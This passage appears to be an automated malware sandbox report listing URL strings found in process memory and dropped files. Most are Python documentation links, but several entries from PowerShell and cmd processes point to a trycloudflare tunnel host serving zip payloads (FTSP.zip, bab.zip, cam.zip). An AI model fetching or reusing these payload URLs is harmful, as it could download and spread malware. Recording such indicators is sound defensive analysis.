Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29469
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29507
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29546
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29576
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29585
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29654
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29679
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29708
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29728
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=2983
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29851
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29962
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29970
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29979
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=29995
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30014
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30024
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30050
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30054
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30095
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30103
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30215
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30241
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30285
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30291
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30302
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30349
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30362
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30399
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30406
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30436
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30450
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30508
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30520
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30522
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30526
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30537
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30541
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30579
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30596
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30622
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30693
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30697
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30708
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30794
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=30897
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31072
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31080
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31128
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31151
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31179
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31233
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31245
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31333
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31338
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31344
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31353
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31368
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31370
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31389
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31399
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31415
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31429
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31540
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31558
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31574
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31638
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31639
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31648
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31650
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31664
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31671
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31690
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31702
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31709
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31756
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31778
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31801
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31819
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31843
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31860
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31900
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31943
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31945
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31970
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31975
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=31985
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32012
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32023
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32025
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32043
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32066
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32071
Source: 3.7.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32102
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32107
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32121
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32185
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32193
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32206
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32226
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32227
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32230
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32248
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32250
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32251
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32253
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32265
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32269
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32296
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32303
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32304
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32305
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32308
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32311
Source: 3.7.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32314
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32320
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32327
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32331
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32348
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32351
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32355
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32356
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32373
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32391
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32403
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32410
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32415
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32418
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32433
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32436
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32441
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32454
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32544
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32550
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32585
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32591
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32609
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32630
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32659
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32662
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32670
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32677
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32690
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32717
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32741
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32792
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32947
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=32951
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33053
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33097
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33169
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33217
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33540
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33618
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33642
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33656
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33679
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33768
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33792
Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=33899
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34247
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=3439
Source: 3.7.html.24.dr, contextvars.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=34762
Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.9.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37228
Source: 3.7.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37627
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4136
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4195
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4201
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4258
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4285
Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.9.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=42967
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4384
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4688
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4707
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4739
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4753
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4868
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4910
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5084
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5150
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5175
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5228
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5237
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5288
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5630
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5675
Source: 3.7.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5680
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5914
Source: 3.1.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=6137
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=6532
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=7769
Source: 3.7.html.24.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=9850
Source: 3.1.html.24.dr	String found in binary or memory: https://codereview.appspot.com/53094
Source: powershell.exe, 0000000D.00000002.1819134442.00000242B45EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1819134442.00000242B45EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1819134442.00000242B45EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: 3.7.html.24.dr, 3.9.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10735
Source: time.html.24.dr	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc1123.html
Source: xmlrpc.client.html.24.dr	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2045.html#section-6.8
Source: 3.7.html.24.dr, urllib.parse.html.24.dr	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2396.html
Source: time.html.24.dr, stdlib.html.24.dr	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2822.html
Source: 2.4.html.24.dr	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3548.html
Source: 3.7.html.24.dr, 3.9.html.24.dr, 3.8.html.24.dr, urllib.parse.html.24.dr	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3986.html
Source: time.html.24.dr	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc822.html
Source: 2.4.html.24.dr	String found in binary or memory: https://developer-old.gnome.org/glib/2.26/
Source: 3.4.html.24.dr	String found in binary or memory: https://docs.python.org/3.4/whatsnew/changelog.html
Source: 3.7.html.24.dr, 3.1.html.24.dr, expressions.html.24.dr, 2.4.html.24.dr, typehints.html.24.dr, tomllib.html.24.dr, time.html.24.dr, sys.html.24.dr, urllib.html.24.dr, contextvars.html.24.dr, unittest.mock.html.24.dr, bytes.html.24.dr, xmlrpc.client.html.24.dr, iterator.html.24.dr, gcsupport.html.24.dr, xml.etree.elementtree.html.24.dr, token.html.24.dr, 2.0.html.24.dr, xml.dom.html.24.dr, 3.4.html.24.dr, appendix.html.24.dr	String found in binary or memory: https://docs.python.org/3/_static/og-image.png
Source: bytes.html.24.dr	String found in binary or memory: https://docs.python.org/3/c-api/bytes.html
Source: contextvars.html.24.dr	String found in binary or memory: https://docs.python.org/3/c-api/contextvars.html
Source: gcsupport.html.24.dr	String found in binary or memory: https://docs.python.org/3/c-api/gcsupport.html
Source: iterator.html.24.dr	String found in binary or memory: https://docs.python.org/3/c-api/iterator.html
Source: sys.html.24.dr	String found in binary or memory: https://docs.python.org/3/c-api/sys.html
Source: typehints.html.24.dr	String found in binary or memory: https://docs.python.org/3/c-api/typehints.html
Source: time.html.24.dr	String found in binary or memory: https://docs.python.org/3/library/time.html
Source: token.html.24.dr	String found in binary or memory: https://docs.python.org/3/library/token.html
Source: tomllib.html.24.dr	String found in binary or memory: https://docs.python.org/3/library/tomllib.html
Source: unittest.mock.html.24.dr	String found in binary or memory: https://docs.python.org/3/library/unittest.mock.html
Source: urllib.html.24.dr	String found in binary or memory: https://docs.python.org/3/library/urllib.html
Source: xml.dom.html.24.dr	String found in binary or memory: https://docs.python.org/3/library/xml.dom.html
Source: xml.etree.elementtree.html.24.dr	String found in binary or memory: https://docs.python.org/3/library/xml.etree.elementtree.html
Source: xmlrpc.client.html.24.dr	String found in binary or memory: https://docs.python.org/3/library/xmlrpc.client.html
Source: expressions.html.24.dr	String found in binary or memory: https://docs.python.org/3/reference/expressions.html
Source: 2.0.html.24.dr	String found in binary or memory: https://docs.python.org/3/whatsnew/2.0.html
Source: 2.4.html.24.dr	String found in binary or memory: https://docs.python.org/3/whatsnew/2.4.html
Source: 3.1.html.24.dr	String found in binary or memory: https://docs.python.org/3/whatsnew/3.1.html
Source: 3.4.html.24.dr	String found in binary or memory: https://docs.python.org/3/whatsnew/3.4.html
Source: 3.7.html.24.dr	String found in binary or memory: https://docs.python.org/3/whatsnew/3.7.html
Source: 3.7.html.24.dr	String found in binary or memory: https://docs.python.org/fr/
Source: 3.7.html.24.dr	String found in binary or memory: https://docs.python.org/ja/
Source: 3.7.html.24.dr	String found in binary or memory: https://docs.python.org/ko/
Source: powershell.exe, 0000000D.00000002.1774446533.00000242A47A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com
Source: powershell.exe, 0000000D.00000002.1822344159.00000242BC690000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774093897.00000242A4023000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1773558872.00000242A2738000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774005092.00000242A2854000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/FTSP.zip
Source: powershell.exe, 0000000D.00000002.1773558872.00000242A2738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/FTSP.zip3.6S
Source: cmd.exe, 00000005.00000003.1243856020.0000023995B54000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774093897.00000242A4023000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774005092.00000242A2856000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1774005092.00000242A2854000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1773558872.00000242A2730000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/FTSP.zipHOMEDRIVE=C:HOMEPATH=
Source: powershell.exe, 0000000D.00000002.1773558872.00000242A2738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/FTSP.zipI.lS
Source: powershell.exe, 0000000D.00000002.1773558872.00000242A2730000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip
Source: cmd.exe, 00000005.00000002.2455424741.0000023995AE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip...
Source: powershell.exe, 0000000D.00000002.1773558872.00000242A2738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/bab.zipr
Source: powershell.exe, 0000000D.00000002.1822344159.00000242BC690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/bab.zipy
Source: cmd.exe, 00000005.00000002.2455424741.0000023995B03000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1533893549.0000023995B03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://german-tan-exotic-collectibles.trycloudflare.com/cam.zip
Source: git.py.24.dr	String found in binary or memory: https://git-scm.com/docs/partial-clone
Source: constants.py.24.dr, sslproto.py.24.dr	String found in binary or memory: https://github.com/MagicStack/uvloop/tree/v0.16.0
Source: powershell.exe, 0000000D.00000002.1774446533.00000242A47A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823076447.00000242BC750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: git.py.24.dr	String found in binary or memory: https://github.com/pypa/pip/issues/1130
Source: bytes.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/bytes.rst
Source: contextvars.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/contextvars.rst
Source: gcsupport.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/gcsupport.rst
Source: iterator.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/iterator.rst
Source: sys.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/sys.rst
Source: typehints.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/typehints.rst
Source: time.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/time.rst
Source: token.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/token.rst
Source: tomllib.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/tomllib.rst
Source: unittest.mock.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/unittest.mock.rst
Source: urllib.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/urllib.rst
Source: xml.dom.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.dom.rst
Source: xml.etree.elementtree.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.etree.elementtree.rst
Source: xmlrpc.client.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xmlrpc.client.rst
Source: expressions.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/reference/expressions.rst
Source: 2.0.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/2.0.rst
Source: 2.4.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/2.4.rst
Source: 3.1.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.1.rst
Source: 3.4.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.4.rst
Source: 3.7.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.7.rst
